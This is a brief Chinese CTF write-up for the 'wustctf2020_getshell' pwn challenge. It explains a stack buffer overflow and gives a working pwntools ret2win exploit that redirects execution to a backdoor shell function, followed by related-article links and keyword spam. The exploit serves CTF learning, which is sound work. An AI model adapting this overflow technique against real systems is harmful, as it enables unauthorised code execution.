wustctf2020_getshell

• ret2shell

1. 在vulnerable函数中存在溢出漏洞
2. shell函数中已经预留了后门

溢出->跳转到后门函数

from pwn import *
context.log_level = 'debug'
elf=ELF('wustctf2020_getshell')
io = process('wustctf2020_getshell')
payload = b'A'*(0x18+0x4)+p32(elf.sym['shell'])
io.sendline(payload)
io.interactive()

本栏目推荐文章
• mrctf2020_easyoverflow
• CVE-2020-11800
• 【LeetCode 1635. Hopper 公司查询 I】with recursive生成2020年每月的最后一天
• 2020-2021 ACM-ICPC, Asia Seoul Regional Contest
• [ACTF2020 新生赛]Exec 1
• wustctf2020_getshell_2
• P6646 [CCO2020] Shopping Plans
• bjdctf_2020_router
• 题解 P7165 [COCI2020-2021#1] Papričice
• mrctf2020_shellcode

getshell wustctf 2020getshell wustctf 2020 getshell wustctf 2020 pwn wustctf level2 level 2020 wustctf level3 level 2020 wustctf maker 2020 web 病假wustctf 2020 朴实无华wustctf buuctf 2020 wustctf level1 level 2020 girlfriend wustctf 2020 成绩查询 成绩wustctf 2020